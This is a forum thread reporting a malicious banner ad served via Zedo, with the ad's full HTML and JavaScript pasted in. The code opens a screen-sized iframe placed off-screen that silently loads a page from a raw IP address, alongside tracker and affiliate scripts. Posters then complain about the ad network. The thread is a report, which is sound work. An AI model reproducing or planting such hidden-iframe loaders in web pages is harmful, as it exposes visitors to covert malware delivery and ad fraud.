This is getting silly, because it is the same ad from the same provider.

 

The Adserver.Exchange JS call is pulling up http://www.7scv.com/ad_160600.php

The referring URL is http://c4.zedo.com/jsc/c4/ff2.html?n=1222;s=1;d=7;w=160;h=600

And a copy of the exploit script:

<!--

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Adserver.Exchange</title>
<style type="text/css">
<!--
body,td,th {
font-family: Verdana, Arial, Helvetica, sans-serif;
font-size: 12px;
color: #000000;
}
body {
background-color: #FFFFFF;
margin-left: 0px;
margin-top: 0px;
margin-right: 0px;
margin-bottom: 0px;
background-repeat: no-repeat;
}
#apDiv1 {
position:fixed;
left:0px;
top:10px;
width:50px;
height:11px;
z-index:-2;
background-color:#FFFFFF;
border:none;
}
-->
</style></head>
<script type="text/JavaScript">
if (window.navigator.userAgent.indexOf("MSIE")>=1)
{
var location="";
}
</script>
<body>
<script language="javascript" type="text/javascript">

window.status="Adserver.Exchange";

</script>
<script type='text/javascript'>
var avwdh=screen.availWidth;
var avhdh=screen.availHeight;
document.write("<div style='position: absolute; left:-100%; top:0%; width:" + avwdh + "px; height:" + avhdh + "px;'><iframe style='width:" + avwdh + "px;height:" + avhdh + "' width='" + avwdh + "' height='" + avhdh + "' scrolling='no' frameborder='no' marginwidth='0' marginheight='0' src='http://63.246.153.36/promote.php?username=ali'></iframe></div>");
document.write("<div style='position: absolute; left:-100%; top:0%; width:" + avwdh + "px; height:" + avhdh + "px;'>");
</script>
<script src='http://s87.cnzz.com/stat.php?id=1650698&web_id=1650698&show=pic' language='JavaScript' charset='gb2312'></script></div>
<script language='JavaScript1.1'>
document.write("<sc"+"ript language='JavaScript1.1' src='http://rover.ebay.com/ar/1/56031/1?campid=5336333393&toolid=56031&customid=&mpt=" + Math.floor(Math.random()*999999999999) + "&adtype=3&size=160x600&def=a3h&n3y=1&p9m=1&v1e=1&x6n=1&m9q=1&b4x=1&k4v=1&u7v=1&a3h=1&mpvc='></sc"+"ript>");
</script>
<noscript>
<a href='http://rover.ebay.com/rover/1/711-53200-19255-45/1?campid=5336333393&toolid=56031&customid=&def=a3h&n3y=1&p9m=1&v1e=1&x6n=1&m9q=1&b4x=1&k4v=1&u7v=1&a3h=1&mpvc='>
<img border='0px' src='http://rover.ebay.com/ar/1/711-53200-19255-45/1?campid=5336333393&toolid=56031&customid=&mpt=[CACHEBUSTER]&adtype=1&size=160x600&def=a3h&n3y=1&p9m=1&v1e=1&x6n=1&m9q=1&b4x=1&k4v=1&u7v=1&a3h=1&mpvc=' alt='Click Here'>
</a>
</noscript>
</body>
</html> -->

Get adblock. I don't even see ads on this site.

Just curious, what part is the bad part?

Sorry for being so pissed, but doing anything associated with Zedo.com is just flatly irresponsible. They are shit, have a horrible reputation, and no legit site should be using them or using any affiliate that partners with them period. I know making money and managing the ad business is tough and a lot harder than it looks from the outside, but regardless of that fact having websites host shit ads from shit providers that try to drop trojans on your machine is still fucking inexcusable.

i think everyone who has a computer knows full well not to go near ads on the internet.

Talk to ioi, don't post it in the forums

the point is not clicking the add, it's the script of the add that tries to hack you directly is that it?